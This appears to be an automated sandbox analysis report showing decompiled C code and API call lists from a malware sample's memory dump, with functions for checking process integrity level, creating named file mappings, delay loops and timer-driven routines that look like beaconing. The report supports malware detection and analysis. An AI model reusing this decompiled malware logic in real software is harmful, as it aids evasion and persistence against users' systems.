                                                                                                                          0x04cd4637
                                                                                                                          0x04cd4640
                                                                                                                          0x04cd4646
                                                                                                                          0x04cd4653
                                                                                                                          0x04cd4660
                                                                                                                          0x04cd4666
                                                                                                                          0x04cd4672
                                                                                                                          0x04cd4678
                                                                                                                          0x04cd4679
                                                                                                                          0x04cd467e
                                                                                                                          0x04cd4684
                                                                                                                          0x04cd468a
                                                                                                                          0x04cd4691
                                                                                                                          0x04cd4698
                                                                                                                          0x04cd469e
                                                                                                                          0x04cd46a5
                                                                                                                          0x04cd46a9
                                                                                                                          0x04cd46b4
                                                                                                                          0x04cd46b9
                                                                                                                          0x04cd46bf
                                                                                                                          0x04cd46c8
                                                                                                                          0x04cd46c8
                                                                                                                          0x04cd46d9
                                                                                                                          0x04cd46d9
                                                                                                                          0x04cd46e8
                                                                                                                          0x04cd46e8
                                                                                                                          0x04cd46f7
                                                                                                                          0x04cd46f7
                                                                                                                          0x04cd4709
                                                                                                                          0x04cd4709
                                                                                                                          0x04cd4718
                                                                                                                          0x04cd4729

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 04CD44BB
                                                                                                                          • wsprintfA.USER32 ref: 04CD4508
                                                                                                                          • wsprintfA.USER32 ref: 04CD4525
                                                                                                                          • wsprintfA.USER32 ref: 04CD4548
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04CD4558
                                                                                                                          • wsprintfA.USER32 ref: 04CD457A
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04CD458A
                                                                                                                          • wsprintfA.USER32 ref: 04CD45C1
                                                                                                                          • wsprintfA.USER32 ref: 04CD45E1
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04CD45FE
                                                                                                                          • GetTickCount.KERNEL32 ref: 04CD460E
                                                                                                                          • RtlEnterCriticalSection.NTDLL(058B9570), ref: 04CD4622
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(058B9570), ref: 04CD4640
                                                                                                                            • Part of subcall function 04CD1974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04CD4653,?,058B95B0), ref: 04CD199F
                                                                                                                            • Part of subcall function 04CD1974: lstrlen.KERNEL32(?,?,?,04CD4653,?,058B95B0), ref: 04CD19A7
                                                                                                                            • Part of subcall function 04CD1974: strcpy.NTDLL ref: 04CD19BE
                                                                                                                            • Part of subcall function 04CD1974: lstrcat.KERNEL32(00000000,?), ref: 04CD19C9
                                                                                                                            • Part of subcall function 04CD1974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04CD4653,?,058B95B0), ref: 04CD19E6
                                                                                                                          • StrTrimA.SHLWAPI(00000000,04CDC2AC,?,058B95B0), ref: 04CD4672
                                                                                                                            • Part of subcall function 04CD38CA: lstrlen.KERNEL32(058B9B10,00000000,00000000,745EC740,04CD467E,00000000), ref: 04CD38DA
                                                                                                                            • Part of subcall function 04CD38CA: lstrlen.KERNEL32(?), ref: 04CD38E2
                                                                                                                            • Part of subcall function 04CD38CA: lstrcpy.KERNEL32(00000000,058B9B10), ref: 04CD38F6
                                                                                                                            • Part of subcall function 04CD38CA: lstrcat.KERNEL32(00000000,?), ref: 04CD3901
                                                                                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04CD4691
                                                                                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04CD4698
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 04CD46A5
                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04CD46A9
                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04CD46D9
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04CD46E8
                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,058B95B0), ref: 04CD46F7
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04CD4709
                                                                                                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04CD4718
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3963266935-0
                                                                                                                          • Opcode ID: 250e81b5ea89a80b45a462a87858a4c33384268357cb1f4b5f59d562492d0a24
                                                                                                                          • Instruction ID: cac5969aea438153701fd630f8002db8960bbdfb067de9c6357e5cc20cc81a9d
                                                                                                                          • Opcode Fuzzy Hash: 250e81b5ea89a80b45a462a87858a4c33384268357cb1f4b5f59d562492d0a24
                                                                                                                          • Instruction Fuzzy Hash: 7A619D79902201AFD721AF68EC48F663BB9FB48354F040525FA0AD7250DA3DFD06DB69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD5461, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E04CD5461(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x4cdd278);
					_v20 = 0;
					_v16 = 0;
					L04CDAED0();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x4cdd2a4; // 0x2ec
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x4cdd284 = 5;
						} else {
							_t68 = E04CD502E(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x4cdd298 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E04CD577D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E04CD2107(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x4cdd27c);
							goto L21;
						} else {
							__eflags =  *0x4cdd280; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E04CD47D5();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x4cdd280);
								L21:
								L04CDAED0();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x4cdd270, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                                                                                          0x04cd5461
                                                                                                                          0x04cd5473
                                                                                                                          0x04cd5476
                                                                                                                          0x04cd5482
                                                                                                                          0x04cd5488
                                                                                                                          0x04cd548d
                                                                                                                          0x04cd55f4
                                                                                                                          0x04cd5493
                                                                                                                          0x04cd5493
                                                                                                                          0x04cd5495
                                                                                                                          0x04cd549a
                                                                                                                          0x04cd549b
                                                                                                                          0x04cd54a1
                                                                                                                          0x04cd54a4
                                                                                                                          0x04cd54a7
                                                                                                                          0x04cd54b5
                                                                                                                          0x04cd54c0
                                                                                                                          0x04cd54c3
                                                                                                                          0x04cd54c5
                                                                                                                          0x04cd54d2
                                                                                                                          0x04cd54dc
                                                                                                                          0x04cd54de
                                                                                                                          0x04cd54e3
                                                                                                                          0x04cd54e8
                                                                                                                          0x04cd54f3
                                                                                                                          0x04cd54f3
                                                                                                                          0x04cd54ea
                                                                                                                          0x04cd54ea
                                                                                                                          0x04cd54f1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd54f1
                                                                                                                          0x04cd54fd
                                                                                                                          0x00000000
                                                                                                                          0x04cd5500
                                                                                                                          0x04cd5504
                                                                                                                          0x04cd550f
                                                                                                                          0x04cd550f
                                                                                                                          0x04cd5516
                                                                                                                          0x04cd551f
                                                                                                                          0x04cd5526
                                                                                                                          0x04cd552f
                                                                                                                          0x04cd5532
                                                                                                                          0x04cd5535
                                                                                                                          0x04cd553a
                                                                                                                          0x04cd553f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd5541
                                                                                                                          0x04cd5544
                                                                                                                          0x04cd5547
                                                                                                                          0x04cd554a
                                                                                                                          0x00000000
                                                                                                                          0x04cd554c
                                                                                                                          0x04cd555b
                                                                                                                          0x04cd555b
                                                                                                                          0x00000000
                                                                                                                          0x04cd5589
                                                                                                                          0x04cd5589
                                                                                                                          0x04cd558e
                                                                                                                          0x04cd55ad
                                                                                                                          0x04cd55af
                                                                                                                          0x04cd55b4
                                                                                                                          0x04cd55b5
                                                                                                                          0x00000000
                                                                                                                          0x04cd5590
                                                                                                                          0x04cd5590
                                                                                                                          0x04cd5596
                                                                                                                          0x00000000
                                                                                                                          0x04cd5598
                                                                                                                          0x04cd5598
                                                                                                                          0x04cd559d
                                                                                                                          0x04cd559f
                                                                                                                          0x04cd55a4
                                                                                                                          0x04cd55a5
                                                                                                                          0x04cd55bb
                                                                                                                          0x04cd55bb
                                                                                                                          0x04cd55c3
                                                                                                                          0x04cd55ce
                                                                                                                          0x04cd55d1
                                                                                                                          0x04cd55dc
                                                                                                                          0x04cd55de
                                                                                                                          0x04cd55e1
                                                                                                                          0x04cd55e3
                                                                                                                          0x00000000
                                                                                                                          0x04cd55e9
                                                                                                                          0x00000000
                                                                                                                          0x04cd55e9
                                                                                                                          0x04cd55e3
                                                                                                                          0x04cd5596
                                                                                                                          0x00000000
                                                                                                                          0x04cd558e
                                                                                                                          0x04cd555e
                                                                                                                          0x04cd5560
                                                                                                                          0x04cd5563
                                                                                                                          0x04cd5564
                                                                                                                          0x04cd5564
                                                                                                                          0x04cd5568
                                                                                                                          0x04cd5572
                                                                                                                          0x04cd5572
                                                                                                                          0x04cd5578
                                                                                                                          0x04cd557b
                                                                                                                          0x04cd557b
                                                                                                                          0x04cd5581
                                                                                                                          0x04cd5581
                                                                                                                          0x04cd55fe
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • memset.NTDLL ref: 04CD5476
                                                                                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04CD5482
                                                                                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04CD54A7
                                                                                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04CD54C3
                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04CD54DC
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04CD5572
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04CD5581
                                                                                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04CD55BB
                                                                                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04CD53C9,?), ref: 04CD55D1
                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04CD55DC
                                                                                                                            • Part of subcall function 04CD502E: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,058B9370,00000000,?,73BCF710,00000000,73BCF730), ref: 04CD507D
                                                                                                                            • Part of subcall function 04CD502E: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,058B93A8,?,00000000,30314549,00000014,004F0053,058B9364), ref: 04CD511A
                                                                                                                            • Part of subcall function 04CD502E: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04CD54EF), ref: 04CD512C
                                                                                                                          • GetLastError.KERNEL32 ref: 04CD55EE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3521023985-0
                                                                                                                          • Opcode ID: ccdd666903c62eb5999a99a7b6a1b10f37be0f431b44d370c8900a0f59cdb750
                                                                                                                          • Instruction ID: 3c93aea84f0ddd5ed5785e3b9e1c95da627be73653349e75f74c2f2e417fbd96
                                                                                                                          • Opcode Fuzzy Hash: ccdd666903c62eb5999a99a7b6a1b10f37be0f431b44d370c8900a0f59cdb750
                                                                                                                          • Instruction Fuzzy Hash: 55514E75801128BFDF11EF95DC44EEEBFBAEF09720F104216F615A2190E774AA44DBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD3598, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E04CD3598(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04CDAECA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x4cdd2e0; // 0xbda5a8
				_t5 = _t13 + 0x4cde876; // 0x58b8e1e
				_t6 = _t13 + 0x4cde59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04CDABEA();
				_t17 = CreateFileMappingW(0xffffffff, 0x4cdd2e4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                                                                                          0x04cd3598
                                                                                                                          0x04cd35a0
                                                                                                                          0x04cd35a4
                                                                                                                          0x04cd35aa
                                                                                                                          0x04cd35af
                                                                                                                          0x04cd35b4
                                                                                                                          0x04cd35b7
                                                                                                                          0x04cd35ba
                                                                                                                          0x04cd35bf
                                                                                                                          0x04cd35c0
                                                                                                                          0x04cd35c3
                                                                                                                          0x04cd35c8
                                                                                                                          0x04cd35cf
                                                                                                                          0x04cd35d9
                                                                                                                          0x04cd35db
                                                                                                                          0x04cd35dc
                                                                                                                          0x04cd35df
                                                                                                                          0x04cd35fb
                                                                                                                          0x04cd3601
                                                                                                                          0x04cd3605
                                                                                                                          0x04cd3653
                                                                                                                          0x04cd3607
                                                                                                                          0x04cd3614
                                                                                                                          0x04cd3624
                                                                                                                          0x04cd362c
                                                                                                                          0x04cd363e
                                                                                                                          0x04cd3642
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd362e
                                                                                                                          0x04cd3631
                                                                                                                          0x04cd3636
                                                                                                                          0x04cd3638
                                                                                                                          0x04cd3638
                                                                                                                          0x04cd3616
                                                                                                                          0x04cd3618
                                                                                                                          0x04cd3644
                                                                                                                          0x04cd3645
                                                                                                                          0x04cd3645
                                                                                                                          0x04cd3614
                                                                                                                          0x04cd365a

                                                                                                                          APIs
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04CD529C,?,?,4D283A53,?,?), ref: 04CD35A4
                                                                                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04CD35BA
                                                                                                                          • _snwprintf.NTDLL ref: 04CD35DF
                                                                                                                          • CreateFileMappingW.KERNELBASE(000000FF,04CDD2E4,00000004,00000000,00001000,?), ref: 04CD35FB
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04CD529C,?,?,4D283A53), ref: 04CD360D
                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04CD3624
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04CD529C,?,?), ref: 04CD3645
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04CD529C,?,?,4D283A53), ref: 04CD364D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1814172918-0
                                                                                                                          • Opcode ID: 20732366162c946d25a3beb949325984f76b1a14ad8dc5f23c5016000c5aff88
                                                                                                                          • Instruction ID: d14a64857331d1280fda2d3e04e7f5f21d9a7768bb5394bb721eccb2339a15fb
                                                                                                                          • Opcode Fuzzy Hash: 20732366162c946d25a3beb949325984f76b1a14ad8dc5f23c5016000c5aff88
                                                                                                                          • Instruction Fuzzy Hash: 56210276A01204BBD711AB68CC09F9E37AAFB44704F144125FB06EB2D0EB70FA02CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD4151, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD4151(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x4cdd294 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04CD75F6(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04CD4AAB(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                                                                                          0x04cd415e
                                                                                                                          0x04cd4165
                                                                                                                          0x04cd416c
                                                                                                                          0x04cd4180
                                                                                                                          0x04cd418b
                                                                                                                          0x04cd41a3
                                                                                                                          0x04cd41b0
                                                                                                                          0x04cd41b3
                                                                                                                          0x04cd41b8
                                                                                                                          0x04cd41c3
                                                                                                                          0x04cd41c7
                                                                                                                          0x04cd41d6
                                                                                                                          0x04cd41da
                                                                                                                          0x04cd41f6
                                                                                                                          0x04cd41f6
                                                                                                                          0x04cd41fa
                                                                                                                          0x04cd41fa
                                                                                                                          0x04cd41ff
                                                                                                                          0x04cd4203
                                                                                                                          0x04cd4209
                                                                                                                          0x04cd420a
                                                                                                                          0x04cd4211
                                                                                                                          0x04cd4217

                                                                                                                          APIs
                                                                                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04CD4183
                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04CD41A3
                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04CD41B3
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 04CD4203
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04CD41D6
                                                                                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04CD41DE
                                                                                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04CD41EE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1295030180-0
                                                                                                                          • Opcode ID: 81af46a3e423d574db999e37197f5508587d6f7817d63b91aa5f0061c44270eb
                                                                                                                          • Instruction ID: 4345306dca70e15d58fd32e572bba3150215b65d2566730cd0b1d361fc38d986
                                                                                                                          • Opcode Fuzzy Hash: 81af46a3e423d574db999e37197f5508587d6f7817d63b91aa5f0061c44270eb
                                                                                                                          • Instruction Fuzzy Hash: 0B216A79D00219FFEB009F94DC84EEEBBBAEB48304F0040A6EA11A6150C775AF05EB64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2EC1E0, Relevance: 10.2, APIs: 2, Strings: 3, Instructions: 1462COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,6E37C338,000008BB), ref: 6E2ED345
                                                                                                                          • Module32FirstW.KERNEL32(6E37A050,6E37B798), ref: 6E2EDD91
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFirstModuleModule32Name
                                                                                                                          • String ID: j6n$1$N
                                                                                                                          • API String ID: 1846537007-767998455
                                                                                                                          • Opcode ID: 1c52a8fb4239f4e1b2e0cf06c705dc13faf70095c59f3ed9a9a65279422aebf7
                                                                                                                          • Instruction ID: 49d7f1dcaba074517f02aef7b9a37e0758418872f8ca569b34a950447486d15f
                                                                                                                          • Opcode Fuzzy Hash: 1c52a8fb4239f4e1b2e0cf06c705dc13faf70095c59f3ed9a9a65279422aebf7
                                                                                                                          • Instruction Fuzzy Hash: 80F272B15049B88FCF08CF69C590A797BBAF797301B3488EAD54596785E338D588EB0C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD262F, Relevance: 9.1, APIs: 6, Instructions: 61sleepmemorytimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E04CD262F(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4cdd270 = _t10;
				if(_t10 != 0) {
					 *0x4cdd160 = GetTickCount();
					_t12 = E04CD1A24(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L04CDB02E();
							_t34 = _t14 + _t16;
							_t18 = E04CD4F23(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E04CD27C7(_t26) != 0) {
							 *0x4cdd298 = 1; // executed
						}
						_t12 = E04CD520D(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                                                                                          0x04cd262f
                                                                                                                          0x04cd2635
                                                                                                                          0x04cd2636
                                                                                                                          0x04cd2642
                                                                                                                          0x04cd2648
                                                                                                                          0x04cd264f
                                                                                                                          0x04cd265f
                                                                                                                          0x04cd2664
                                                                                                                          0x04cd266b
                                                                                                                          0x04cd266d
                                                                                                                          0x04cd2672
                                                                                                                          0x04cd2678
                                                                                                                          0x04cd267e
                                                                                                                          0x04cd2688
                                                                                                                          0x04cd268c
                                                                                                                          0x04cd268e
                                                                                                                          0x04cd2693
                                                                                                                          0x04cd2694
                                                                                                                          0x04cd2695
                                                                                                                          0x04cd269a
                                                                                                                          0x04cd26a0
                                                                                                                          0x04cd26ab
                                                                                                                          0x04cd26ac
                                                                                                                          0x04cd26b2
                                                                                                                          0x04cd26b8
                                                                                                                          0x04cd26c4
                                                                                                                          0x04cd26c6
                                                                                                                          0x04cd26c6
                                                                                                                          0x04cd26d0
                                                                                                                          0x04cd26d0
                                                                                                                          0x04cd2651
                                                                                                                          0x04cd2653
                                                                                                                          0x04cd2653
                                                                                                                          0x04cd26da

                                                                                                                          APIs
                                                                                                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,04CD1900,?), ref: 04CD2642
                                                                                                                          • GetTickCount.KERNEL32 ref: 04CD2656
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04CD1900,?), ref: 04CD2672
                                                                                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,04CD1900,?), ref: 04CD2678
                                                                                                                          • _aullrem.NTDLL(?,?,00000013,00000000), ref: 04CD2695
                                                                                                                          • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04CD1900,?), ref: 04CD26B2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
